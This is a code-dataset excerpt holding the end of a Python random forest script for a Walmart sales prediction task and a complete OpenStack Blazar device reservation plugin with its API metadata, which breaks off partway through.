np.sort(np.random.choice(train_in_all.index,size=num_train,replace=False))\r\nbool1 = np.zeros((len(train_in_all),1),dtype=bool)\r\nbool1[train_ind] = True\r\nbool2 = ~bool1\r\nvalid_ind = train_in_all[bool2].index\r\ntrain_in = train_in_all[bool1]\r\ntrain_out = train_out_all[train_ind]\r\nvalid_in = train_in_all[bool2]\r\nvalid_out = train_out_all[valid_ind]\r\n\r\n# Train RF\r\nrf = RandomForestRegressor(n_estimators = 50, n_jobs=-1, min_samples_split = 11, min_samples_leaf = 8)\r\nrf = rf.fit(train_in,train_out)\r\n\r\n# Validate RF!!\r\nvalidation = rf.predict(valid_in)\r\nvalid_score = np.sqrt(np.sum(np.square(np.log(validation+1)-np.log(valid_out+1)))/len(validation))\r\n \r\nprint('This program had a validation score of ' + str(valid_score) + '.')\r\nprint('This program took ' + str((time.time()-start_time)/60) + ' minutes to run.')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "sub_path": "walmartAttempt.py", "file_name": "walmartAttempt.py", "file_ext": "py", "file_size_in_byte": 4233, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "time.time", "line_number": 9, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 12, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 87, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 88, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 103, "usage_type": "call"}, {"api_name": "time.time", "line_number": 106, "usage_type": "call"}]} +{"seq_id": "88989066", "text": "# -*- coding: utf-8 -*-\n#\n# Author: Pierre Riteau \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom collections import defaultdict\nimport datetime\n\nfrom oslo_config import cfg\nfrom oslo_utils import strutils\nfrom stevedore import named\n\nfrom blazar.db import api as db_api\nfrom blazar.db import exceptions as db_ex\nfrom blazar.db import utils as db_utils\nfrom blazar.manager import exceptions as manager_ex\nfrom blazar.plugins import base\nfrom blazar.plugins import devices as plugin\nfrom blazar.plugins import monitor\nfrom blazar import status\nfrom blazar.utils import plugins as plugins_utils\nfrom oslo_log import log as logging\nfrom random import shuffle\n\n\nplugin_opts = [\n cfg.StrOpt('before_end',\n default='',\n help='Actions which we will be taken before the end of '\n 'the lease'),\n cfg.ListOpt('plugins',\n default=['zun.plugin'],\n help='All plugins to use (one for every device driver to '\n 'support.)'),\n cfg.IntOpt('cleaning_time',\n default=0,\n min=0,\n help='The minimum interval [minutes] between the end of a '\n 'lease and the start of the next lease for the same '\n 'device. This interval is used for cleanup.'),\n cfg.StrOpt('default_resource_properties',\n default='',\n help='Default resource_properties when creating a lease of '\n 'this type.'),\n cfg.BoolOpt('display_default_resource_properties',\n default=True,\n help='Display default resource_properties if allocation fails '\n 'due to not enough resources'),\n cfg.BoolOpt('retry_allocation_without_defaults',\n default=True,\n help='Whether an allocation should be retried on failure '\n 'without the default properties'),\n]\n\nplugin_opts.extend(monitor.monitor_opts)\n\nCONF = cfg.CONF\nCONF.register_opts(plugin_opts, group=plugin.RESOURCE_TYPE)\nLOG = logging.getLogger(__name__)\n\nbefore_end_options = ['', 'default', 'email']\n\nQUERY_TYPE_ALLOCATION = 'allocation'\n\nMONITOR_ARGS = {\"resource_type\": plugin.RESOURCE_TYPE}\n\n\ndef _get_plugins():\n \"\"\"Return dict of resource-plugin class pairs.\"\"\"\n plugins = {}\n\n extension_manager = named.NamedExtensionManager(\n namespace='blazar.device.driver.plugins',\n names=CONF.device.plugins,\n invoke_on_load=False\n )\n\n for ext in extension_manager.extensions:\n try:\n plugin_obj = ext.plugin()\n except Exception as e:\n LOG.warning(\"Could not load {0} plugin \"\n \"for resource type {1} '{2}'\".format(\n ext.name, ext.plugin.device_driver, e))\n else:\n if plugin_obj.device_driver in plugins:\n msg = (\"You have provided several plugins for \"\n \"one device driver in configuration file. \"\n \"Please set one plugin per device driver.\")\n raise manager_ex.PluginConfigurationError(error=msg)\n\n plugins[plugin_obj.device_driver] = plugin_obj\n return plugins\n\n\nclass DevicePlugin(base.BasePlugin):\n \"\"\"Plugin for device resource.\"\"\"\n resource_type = plugin.RESOURCE_TYPE\n title = 'Device Plugin'\n description = 'This plugin creates and deletes devices.'\n query_options = {\n QUERY_TYPE_ALLOCATION: ['lease_id', 'reservation_id']\n }\n\n def __init__(self):\n super(DevicePlugin, self).__init__()\n self.plugins = _get_plugins()\n self.monitor = DeviceMonitorPlugin(**MONITOR_ARGS)\n self.monitor.register_reallocater(self._reallocate)\n\n def reserve_resource(self, reservation_id, values):\n \"\"\"Create reservation.\"\"\"\n device_ids = self.allocation_candidates(values)\n\n if not device_ids:\n raise manager_ex.NotEnoughDevicesAvailable()\n\n device_rsrv_values = {\n 'reservation_id': reservation_id,\n 'resource_properties': values['resource_properties'],\n 'count_range': values['count_range'],\n 'status': 'pending',\n 'before_end': values['before_end'],\n }\n device_reservation = db_api.device_reservation_create(\n device_rsrv_values)\n for device_id in device_ids:\n db_api.device_allocation_create({'device_id': device_id,\n 'reservation_id': reservation_id})\n return device_reservation['id']\n\n def update_reservation(self, reservation_id, values):\n \"\"\"Update reservation.\"\"\"\n reservation = db_api.reservation_get(reservation_id)\n lease = db_api.lease_get(reservation['lease_id'])\n\n if (not [x for x in values.keys() if x in ['min', 'max',\n 'resource_properties']]\n and values['start_date'] >= lease['start_date']\n and values['end_date'] <= lease['end_date']):\n # Nothing to update\n return\n\n dates_before = {'start_date': lease['start_date'],\n 'end_date': lease['end_date']}\n dates_after = {'start_date': values['start_date'],\n 'end_date': values['end_date']}\n device_reservation = db_api.device_reservation_get(\n reservation['resource_id'])\n self._update_allocations(dates_before, dates_after, reservation_id,\n reservation['status'], device_reservation,\n values, lease)\n\n updates = {}\n if 'min' in values or 'max' in values:\n count_range = str(values.get(\n 'min', device_reservation['count_range'].split('-')[0])\n ) + '-' + str(values.get(\n 'max', device_reservation['count_range'].split('-')[1])\n )\n updates['count_range'] = count_range\n if 'resource_properties' in values:\n updates['resource_properties'] = values.get(\n 'resource_properties')\n if updates:\n db_api.device_reservation_update(device_reservation['id'], updates)\n\n def on_start(self, resource_id, lease=None):\n device_reservation = db_api.device_reservation_get(resource_id)\n\n devices = defaultdict(list)\n for allocation in db_api.device_allocation_get_all_by_values(\n reservation_id=device_reservation['reservation_id']):\n device = db_api.device_get(allocation['device_id'])\n devices[device[\"device_driver\"]].append(device)\n\n for device_driver, devices_list in devices.items():\n self.plugins[device_driver].allocate(\n device_reservation, lease, devices_list)\n\n def before_end(self, resource_id, lease=None):\n \"\"\"Take an action before the end of a lease.\"\"\"\n device_reservation = db_api.device_reservation_get(resource_id)\n\n action = device_reservation['before_end']\n if action == 'default':\n action = CONF[plugin.RESOURCE_TYPE].before_end\n\n if action == 'email':\n plugins_utils.send_lease_extension_reminder(\n lease, CONF.os_region_name)\n\n def on_end(self, resource_id, lease=None):\n device_reservation = db_api.device_reservation_get(resource_id)\n db_api.device_reservation_update(device_reservation['id'],\n {'status': 'completed'})\n\n devices = defaultdict(list)\n allocations = db_api.device_allocation_get_all_by_values(\n reservation_id=device_reservation['reservation_id'])\n for allocation in allocations:\n device = db_api.device_get(allocation['device_id'])\n devices[device[\"device_driver\"]].append(\n db_api.device_get(allocation['device_id']))\n db_api.device_allocation_destroy(allocation['id'])\n\n for device_driver, devices_list in devices.items():\n self.plugins[device_driver].deallocate(\n device_reservation, lease, devices_list)\n\n def _get_extra_capabilities(self, device_id):\n extra_capabilities = {}\n raw_extra_capabilities = (\n db_api.device_extra_capability_get_all_per_device(device_id))\n for capability, capability_name in raw_extra_capabilities:\n key = capability_name\n extra_capabilities[key] = capability.capability_value\n return extra_capabilities\n\n def get(self, device_id):\n return self.get_device(device_id)\n\n def get_device(self, device_id):\n device = db_api.device_get(device_id)\n if device is None:\n return device\n return self.get_device_with_extra_capabilities(device)\n\n def get_device_with_extra_capabilities(self, device):\n extra_capabilities = self._get_extra_capabilities(device[\"id\"])\n if extra_capabilities:\n res = device.copy()\n res.update(extra_capabilities)\n return res\n else:\n return device\n\n def list_devices(self):\n raw_device_list = db_api.device_list()\n device_list = []\n for device in raw_device_list:\n device_list.append(self.get_device(device['id']))\n return device_list\n\n def create_device(self, values):\n if 'trust_id' in values:\n del values['trust_id']\n device_id = self.plugins[values.get(\n 'device_driver')].create_device(values)\n return self.get_device(device_id)\n\n def is_updatable_extra_capability(self, capability, capability_name):\n reservations = db_utils.get_reservations_by_device_id(\n capability['device_id'], datetime.datetime.utcnow(),\n datetime.date.max)\n\n for r in reservations:\n plugin_reservation = db_utils.get_plugin_reservation(\n r['resource_type'], r['resource_id'])\n\n requirements_queries = plugins_utils.convert_requirements(\n plugin_reservation['resource_properties'])\n\n for requirement in requirements_queries:\n if requirement.split(\" \")[0] == capability_name:\n return False\n return True\n\n def update_device(self, device_id, values):\n # nothing to update\n if not values:\n return self.get_device(device_id)\n\n device_property_names = ['device_type', 'device_driver']\n device_properties = {}\n for prop_key in list(values.keys()):\n if prop_key in device_property_names:\n device_properties[prop_key] = values.pop(prop_key)\n if device_properties:\n db_api.device_update(device_id, device_properties)\n\n cant_update_extra_capability = []\n cant_delete_extra_capability = []\n previous_capabilities = self._get_extra_capabilities(device_id)\n updated_keys = set(values.keys()) & set(previous_capabilities.keys())\n new_keys = set(values.keys()) - set(previous_capabilities.keys())\n\n for key in updated_keys:\n raw_capability, cap_name = next(iter(\n db_api.device_extra_capability_get_all_per_name(\n device_id, key)))\n\n if self.is_updatable_extra_capability(raw_capability, cap_name):\n if values[key] is not None:\n try:\n capability = {'capability_value': values[key]}\n db_api.device_extra_capability_update(\n raw_capability['id'], capability)\n except (db_ex.BlazarDBException, RuntimeError):\n cant_update_extra_capability.append(cap_name)\n else:\n try:\n db_api.device_extra_capability_destroy(\n raw_capability['id'])\n except db_ex.BlazarDBException:\n cant_delete_extra_capability.append(cap_name)\n else:\n LOG.info(\"Capability %s can't be updated because \"\n \"existing reservations require it.\",\n cap_name)\n cant_update_extra_capability.append(cap_name)\n\n for key in new_keys:\n new_capability = {\n 'device_id': device_id,\n 'capability_name': key,\n 'capability_value': values[key],\n }\n try:\n db_api.device_extra_capability_create(new_capability)\n except (db_ex.BlazarDBException, RuntimeError):\n cant_update_extra_capability.append(key)\n\n if cant_update_extra_capability:\n raise manager_ex.CantAddExtraCapability(\n host=device_id, keys=cant_update_extra_capability)\n\n if cant_delete_extra_capability:\n raise manager_ex.ExtraCapabilityNotFound(\n resource=device_id, keys=cant_delete_extra_capability)\n\n LOG.info('Extra capabilities on device %s updated with %s',\n device_id, values)\n return self.get_device(device_id)\n\n def delete_device(self, device_id):\n device = db_api.device_get(device_id)\n if not device:\n raise manager_ex.DeviceNotFound(device=device_id)\n\n if db_api.device_allocation_get_all_by_values(\n device_id=device_id):\n raise manager_ex.CantDeleteDevice(\n device=device_id,\n msg='The device is reserved.'\n )\n\n try:\n db_api.device_destroy(device_id)\n self.plugins[device[\"device_driver\"]].after_destroy(device)\n except db_ex.BlazarDBException as e:\n raise manager_ex.CantDeleteDevice(device=device_id, msg=str(e))\n\n def reallocate_device(self, device_id, data):\n allocations = self.get_allocations(device_id, data, detail=True)\n\n for alloc in allocations['reservations']:\n reservation_flags = {}\n device_allocation = db_api.device_allocation_get_all_by_values(\n device_id=device_id,\n reservation_id=alloc['id'])[0]\n\n if self._reallocate(device_allocation):\n if alloc['status'] == status.reservation.ACTIVE:\n reservation_flags.update(dict(resources_changed=True))\n db_api.lease_update(alloc['lease_id'], dict(degraded=True))\n else:\n reservation_flags.update(dict(missing_resources=True))\n db_api.lease_update(alloc['lease_id'], dict(degraded=True))\n\n db_api.reservation_update(alloc['id'], reservation_flags)\n\n return self.get_allocations(device_id, data)\n\n def _reallocate(self, allocation):\n \"\"\"Allocate an alternative device.\n\n :param allocation: allocation to change.\n :return: True if an alternative device was successfully allocated.\n \"\"\"\n reservation = db_api.reservation_get(allocation['reservation_id'])\n device_reservation = db_api.device_reservation_get(\n reservation['resource_id'])\n lease = db_api.lease_get(reservation['lease_id'])\n\n # Remove the old device from the trait.\n if reservation['status'] == status.reservation.ACTIVE:\n device = db_api.device_get(allocation['device_id'])\n self.plugins[device[\"device_driver\"]].remove_active_device(\n device, device_reservation, lease)\n\n # Allocate an alternative device.\n start_date = max(datetime.datetime.utcnow(), lease['start_date'])\n new_deviceids = self._matching_devices(\n device_reservation['resource_properties'],\n '1-1', start_date, lease['end_date'], lease['project_id']\n )\n if not new_deviceids:\n db_api.device_allocation_destroy(allocation['id'])\n LOG.warn('Could not find alternative device for reservation %s '\n '(lease: %s).', reservation['id'], lease['name'])\n return False\n else:\n new_deviceid = new_deviceids.pop()\n db_api.device_allocation_update(allocation['id'],\n {'device_id': new_deviceid})\n LOG.warn('Resource changed for reservation %s (lease: %s).',\n reservation['id'], lease['name'])\n if reservation['status'] == status.reservation.ACTIVE:\n new_device = db_api.device_get(new_deviceid)\n self.plugins[device[\"device_driver\"]].add_active_device(\n new_device, device_reservation, lease)\n\n return True\n\n def list_allocations(self, query, detail=False):\n devices_id_list = [d['id'] for d in db_api.device_list()]\n options = self.get_query_options(query, QUERY_TYPE_ALLOCATION)\n options['detail'] = detail\n devices_allocations = self.query_device_allocations(devices_id_list,\n **options)\n self.add_extra_allocation_info(devices_allocations)\n return [{\"resource_id\": device, \"reservations\": allocs}\n for device, allocs in devices_allocations.items()]\n\n def get_allocations(self, device_id, query, detail=False):\n options = self.get_query_options(query, QUERY_TYPE_ALLOCATION)\n options['detail'] = detail\n device_allocations = self.query_device_allocations(\n [device_id], **options)\n allocs = device_allocations.get(device_id, [])\n return {\"resource_id\": device_id, \"reservations\": allocs}\n\n def query_allocations(self, devices, lease_id=None, reservation_id=None):\n return self.query_device_allocations(devices, lease_id=lease_id,\n reservation_id=reservation_id)\n\n def query_device_allocations(self, devices, lease_id=None,\n reservation_id=None, detail=False):\n \"\"\"Return dict of device and its allocations.\n\n The list element forms\n {\n 'device-id': [\n {\n 'lease_id': lease_id,\n 'id': reservation_id,\n 'start_date': lease_start_date,\n 'end_date': lease_end_date\n },\n ]\n }.\n \"\"\"\n start = datetime.datetime.utcnow()\n end = datetime.date.max\n\n reservations = db_utils.get_reservation_allocations_by_device_ids(\n devices, start, end, lease_id, reservation_id)\n device_allocations = {d: [] for d in devices}\n\n for reservation in reservations:\n if not detail:\n del reservation['project_id']\n del reservation['lease_name']\n del reservation['status']\n\n for device_id in reservation['device_ids']:\n if device_id in device_allocations.keys():\n device_allocations[device_id].append({\n k: v for k, v in reservation.items()\n if k != 'device_ids'})\n\n return device_allocations\n\n def update_default_parameters(self, values):\n self.add_default_resource_properties(values)\n\n def allocation_candidates(self, values):\n self._check_params(values)\n\n device_ids = self._matching_devices(\n values['resource_properties'],\n values['count_range'],\n values['start_date'],\n values['end_date'],\n values['project_id']\n )\n\n min_devices, _ = [int(n) for n in values['count_range'].split('-')]\n\n if len(device_ids) < min_devices:\n raise manager_ex.NotEnoughHostsAvailable()\n\n return device_ids\n\n def _convert_int_param(self, param, name):\n \"\"\"Checks that the parameter is present and can be converted to int.\"\"\"\n if param is None:\n raise manager_ex.MissingParameter(param=name)\n if strutils.is_int_like(param):\n param = int(param)\n else:\n raise manager_ex.MalformedParameter(param=name)\n return param\n\n def _validate_min_max_range(self, values, min_devices, max_devices):\n min_devices = self._convert_int_param(min_devices, 'min')\n max_devices = self._convert_int_param(max_devices, 'max')\n if min_devices <= 0 or max_devices <= 0:\n raise manager_ex.MalformedParameter(\n param='min and max (must be greater than or equal to 1)')\n if max_devices < min_devices:\n raise manager_ex.InvalidRange()\n values['count_range'] = str(min_devices) + '-' + str(max_devices)\n\n def _check_params(self, values):\n self._validate_min_max_range(values, values.get('min'),\n values.get('max'))\n\n if 'resource_properties' not in values:\n raise manager_ex.MissingParameter(param='resource_properties')\n\n if 'before_end' not in values:\n values['before_end'] = 'default'\n if values['before_end'] not in before_end_options:\n raise manager_ex.MalformedParameter(param='before_end')\n\n if 'on_start' not in values:\n values['on_start'] = 'default'\n\n def _matching_devices(self, resource_properties, count_range,\n start_date, end_date, project_id):\n \"\"\"Return the matching devices (preferably not allocated)\"\"\"\n count_range = count_range.split('-')\n min_device = count_range[0]\n max_device = count_range[1]\n allocated_device_ids = []\n not_allocated_device_ids = []\n filter_array = []\n start_date_with_margin = start_date - datetime.timedelta(\n minutes=CONF.device.cleaning_time)\n end_date_with_margin = end_date + datetime.timedelta(\n minutes=CONF.device.cleaning_time)\n\n if resource_properties:\n filter_array += plugins_utils.convert_requirements(\n resource_properties)\n for device in db_api.reservable_device_get_all_by_queries(\n filter_array):\n device = self.get_device_with_extra_capabilities(device)\n if not self.is_project_allowed(project_id, device):\n continue\n if not db_api.device_allocation_get_all_by_values(\n device_id=device['id']):\n not_allocated_device_ids.append(device['id'])\n elif db_utils.get_free_periods(\n device['id'],\n start_date_with_margin,\n end_date_with_margin,\n end_date_with_margin - start_date_with_margin,\n resource_type='device'\n ) == [\n (start_date_with_margin, end_date_with_margin),\n ]:\n allocated_device_ids.append(device['id'])\n if len(not_allocated_device_ids) >= int(min_device):\n shuffle(not_allocated_device_ids)\n return not_allocated_device_ids[:int(max_device)]\n all_device_ids = allocated_device_ids + not_allocated_device_ids\n if len(all_device_ids) >= int(min_device):\n shuffle(all_device_ids)\n return all_device_ids[:int(max_device)]\n else:\n return []\n\n def _update_allocations(self, dates_before, dates_after, reservation_id,\n reservation_status, device_reservation, values,\n lease):\n min_devices = values.get('min', int(\n device_reservation['count_range'].split('-')[0]))\n max_devices = values.get(\n 'max', int(device_reservation['count_range'].split('-')[1]))\n self._validate_min_max_range(values, min_devices, max_devices)\n resource_properties = values.get(\n 'resource_properties',\n device_reservation['resource_properties'])\n allocs = db_api.device_allocation_get_all_by_values(\n reservation_id=reservation_id)\n\n allocs_to_remove = self._allocations_to_remove(\n dates_before, dates_after, max_devices,\n resource_properties, allocs)\n\n if (allocs_to_remove and\n reservation_status == status.reservation.ACTIVE):\n raise manager_ex.NotEnoughHostsAvailable()\n\n kept_devices = len(allocs) - len(allocs_to_remove)\n if kept_devices < max_devices:\n min_devices = min_devices - kept_devices \\\n if (min_devices - kept_devices) > 0 else 0\n max_devices = max_devices - kept_devices\n device_ids = self._matching_devices(\n resource_properties,\n str(min_devices) + '-' + str(max_devices),\n dates_after['start_date'], dates_after['end_date'],\n lease['project_id'])\n if len(device_ids) >= min_devices:\n for device_id in device_ids:\n db_api.device_allocation_create(\n {'device_id': device_id,\n 'reservation_id': reservation_id})\n new_device = db_api.device_get(device_id)\n if reservation_status == status.reservation.ACTIVE:\n # Add new device into the trait.\n self.plugins[new_device[\"device_driver\"]].\\\n add_active_device(\n new_device, device_reservation, lease)\n else:\n raise manager_ex.NotEnoughHostsAvailable()\n\n for allocation in allocs_to_remove:\n db_api.device_allocation_destroy(allocation['id'])\n\n def _allocations_to_remove(self, dates_before, dates_after, max_devices,\n resource_properties, allocs):\n allocs_to_remove = []\n requested_device_ids = [device['id'] for device in\n self._filter_devices_by_properties(\n resource_properties\n )]\n\n for alloc in allocs:\n if alloc['device_id'] not in requested_device_ids:\n allocs_to_remove.append(alloc)\n continue\n if (dates_before['start_date'] > dates_after['start_date'] or\n dates_before['end_date'] < dates_after['end_date']):\n reserved_periods = db_utils.get_reserved_periods(\n alloc['device_id'],\n dates_after['start_date'],\n dates_after['end_date'],\n datetime.timedelta(seconds=1))\n\n max_start = max(dates_before['start_date'],\n dates_after['start_date'])\n min_end = min(dates_before['end_date'],\n dates_after['end_date'])\n\n if not (len(reserved_periods) == 0 or\n (len(reserved_periods) == 1 and\n reserved_periods[0][0] == max_start and\n reserved_periods[0][1] == min_end)):\n allocs_to_remove.append(alloc)\n\n kept_devices = len(allocs) - len(allocs_to_remove)\n if kept_devices > max_devices:\n allocs_to_remove.extend(\n [allocation for allocation in allocs\n if allocation not in allocs_to_remove\n ][:(kept_devices - max_devices)]\n )\n\n return allocs_to_remove\n\n def _filter_devices_by_properties(self, resource_properties):\n filter = []\n if resource_properties:\n filter += plugins_utils.convert_requirements(resource_properties)\n if filter:\n return db_api.device_get_all_by_queries(filter)\n else:\n return db_api.device_list()\n\n\nclass DeviceMonitorPlugin(monitor.GeneralMonitorPlugin):\n \"\"\"Monitor plugin for device resource.\"\"\"\n\n def __new__(cls, *args, **kwargs):\n if not cls._instance:\n cls._instance = \\\n super(DeviceMonitorPlugin, cls).__new__(cls, *args, **kwargs)\n cls._instance.plugins = _get_plugins()\n return cls._instance\n\n def filter_allocations(self, reservation, device_ids):\n return [alloc for alloc\n in reservation['device_allocations']\n if alloc['device_id'] in device_ids]\n\n def get_reservations_by_resource_ids(self, device_ids,\n interval_begin, interval_end):\n return db_utils.get_reservations_by_device_ids(device_ids,\n interval_begin,\n interval_end)\n\n def get_unreservable_resourses(self):\n return db_api.unreservable_device_get_all_by_queries([])\n\n def get_notification_event_types(self):\n \"\"\"Get event types of notification messages to handle.\"\"\"\n return []\n\n def notification_callback(self, event_type, payload):\n \"\"\"Handle a notification message.\n\n It is used as a callback of a notification-based resource monitor.\n :param event_type: an event type of a notification.\n :param payload: a payload of a notification.\n :return: a dictionary of {reservation id: flags to update}\n e.g. {'de27786d-bd96-46bb-8363-19c13b2c6657':\n {'missing_resources': True}}\n \"\"\"\n return {}\n\n def set_reservable(self, resource, is_reservable):\n db_api.device_update(resource[\"id\"], {\"reservable\": is_reservable})\n LOG.warn('%s %s.', resource[\"name\"],\n \"recovered\" if is_reservable else \"failed\")\n\n def poll_resource_failures(self):\n \"\"\"Check health of devices by calling driver service API.\n\n :return: a list of failed devices, a list of recovered devices.\n \"\"\"\n devices = db_api.device_get_all_by_filters({})\n\n device_partition = defaultdict(list)\n for device in devices:\n device_partition[device[\"device_driver\"]].append(device)\n\n failed_devices = []\n recovered_devices = []\n\n for device_driver in self.plugins.keys():\n try:\n driver_failed_devices, driver_recovered_devices = \\\n self.plugins[device_driver].poll_resource_failures(\n device_partition[device_driver])\n failed_devices.extend(driver_failed_devices)\n recovered_devices.extend(driver_recovered_devices)\n except AttributeError as e:\n LOG.warning('poll_resource_failures is not implemented for {}'\n .format(device_driver))\n raise e\n\n return failed_devices, recovered_devices\n", "sub_path": "blazar/plugins/devices/device_plugin.py", "file_name": "device_plugin.py", "file_ext": "py", "file_size_in_byte": 31260, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "oslo_config.cfg.StrOpt", "line_number": 38, "usage_type": "call"}, {"api_name": "oslo_config.cfg", "line_number": 38, "usage_type": "name"}, {"api_name": "oslo_config.cfg.ListOpt", "line_number": 42, "usage_type": "call"}, {"api_name": "oslo_config.cfg", "line_number": 42, "usage_type": "name"}, {"api_name": "oslo_config.cfg.IntOpt", "line_number": 46, "usage_type": "call"}, {"api_name": "oslo_config.cfg", "line_number": 46, "usage_type": "name"}, {"api_name": "oslo_config.cfg.StrOpt", "line_number": 52, "usage_type": "call"}, {"api_name": "oslo_config.cfg", "line_number": 52, "usage_type": "name"}, {"api_name": "oslo_config.cfg.BoolOpt", "line_number": 56, "usage_type": "call"}, {"api_name": "oslo_config.cfg", "line_number": 56, "usage_type": "name"}, {"api_name": "oslo_config.cfg.BoolOpt", "line_number": 60, "usage_type": "call"}, {"api_name": "oslo_config.cfg", "line_number": 60, "usage_type": "name"}, {"api_name": "blazar.plugins.monitor.monitor_opts", "line_number": 66, "usage_type": "attribute"}, {"api_name": "blazar.plugins.monitor", "line_number": 66, "usage_type": "name"}, {"api_name": "oslo_config.cfg.CONF", "line_number": 68, "usage_type": "attribute"}, {"api_name": "oslo_config.cfg", "line_number": 68, "usage_type": "name"}, {"api_name": "blazar.plugins.devices.RESOURCE_TYPE", "line_number": 69, "usage_type": "attribute"}, {"api_name": "blazar.plugins.devices", "line_number": 69, "usage_type": "name"}, {"api_name": "oslo_log.log.getLogger", "line_number": 70, "usage_type": "call"}, {"api_name": "oslo_log.log", "line_number": 70, "usage_type": "name"}, {"api_name": "blazar.plugins.devices.RESOURCE_TYPE", "line_number": 76, "usage_type": "attribute"}, {"api_name": "blazar.plugins.devices", "line_number": 76, "usage_type": "name"}, {"api_name": "stevedore.named.NamedExtensionManager", "line_number": 83, "usage_type": "call"}, {"api_name": "stevedore.named", "line_number": 83, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.PluginConfigurationError", "line_number": 101, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 101, "usage_type": "name"}, {"api_name": "blazar.plugins.base.BasePlugin", "line_number": 107, "usage_type": "attribute"}, {"api_name": "blazar.plugins.base", "line_number": 107, "usage_type": "name"}, {"api_name": "blazar.plugins.devices.RESOURCE_TYPE", "line_number": 109, "usage_type": "attribute"}, {"api_name": "blazar.plugins.devices", "line_number": 109, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.NotEnoughDevicesAvailable", "line_number": 127, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 127, "usage_type": "name"}, {"api_name": "blazar.db.api.device_reservation_create", "line_number": 136, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 136, "usage_type": "name"}, {"api_name": "blazar.db.api.device_allocation_create", "line_number": 139, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 139, "usage_type": "name"}, {"api_name": "blazar.db.api.reservation_get", "line_number": 145, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 145, "usage_type": "name"}, {"api_name": "blazar.db.api.lease_get", "line_number": 146, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 146, "usage_type": "name"}, {"api_name": "blazar.db.api.device_reservation_get", "line_number": 159, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 159, "usage_type": "name"}, {"api_name": "blazar.db.api.device_reservation_update", "line_number": 177, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 177, "usage_type": "name"}, {"api_name": "blazar.db.api.device_reservation_get", "line_number": 180, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 180, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 182, "usage_type": "call"}, {"api_name": "blazar.db.api.device_allocation_get_all_by_values", "line_number": 183, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 183, "usage_type": "name"}, {"api_name": "blazar.db.api.device_get", "line_number": 185, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 185, "usage_type": "name"}, {"api_name": "blazar.db.api.device_reservation_get", "line_number": 194, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 194, "usage_type": "name"}, {"api_name": "blazar.plugins.devices.RESOURCE_TYPE", "line_number": 198, "usage_type": "attribute"}, {"api_name": "blazar.plugins.devices", "line_number": 198, "usage_type": "name"}, {"api_name": "blazar.utils.plugins.send_lease_extension_reminder", "line_number": 201, "usage_type": "call"}, {"api_name": "blazar.utils.plugins", "line_number": 201, "usage_type": "name"}, {"api_name": "blazar.db.api.device_reservation_get", "line_number": 205, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 205, "usage_type": "name"}, {"api_name": "blazar.db.api.device_reservation_update", "line_number": 206, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 206, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 209, "usage_type": "call"}, {"api_name": "blazar.db.api.device_allocation_get_all_by_values", "line_number": 210, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 210, "usage_type": "name"}, {"api_name": "blazar.db.api.device_get", "line_number": 213, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 213, "usage_type": "name"}, {"api_name": "blazar.db.api.device_get", "line_number": 215, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 215, "usage_type": "name"}, {"api_name": "blazar.db.api.device_allocation_destroy", "line_number": 216, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 216, "usage_type": "name"}, {"api_name": "blazar.db.api.device_extra_capability_get_all_per_device", "line_number": 225, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 225, "usage_type": "name"}, {"api_name": "blazar.db.api.device_get", "line_number": 235, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 235, "usage_type": 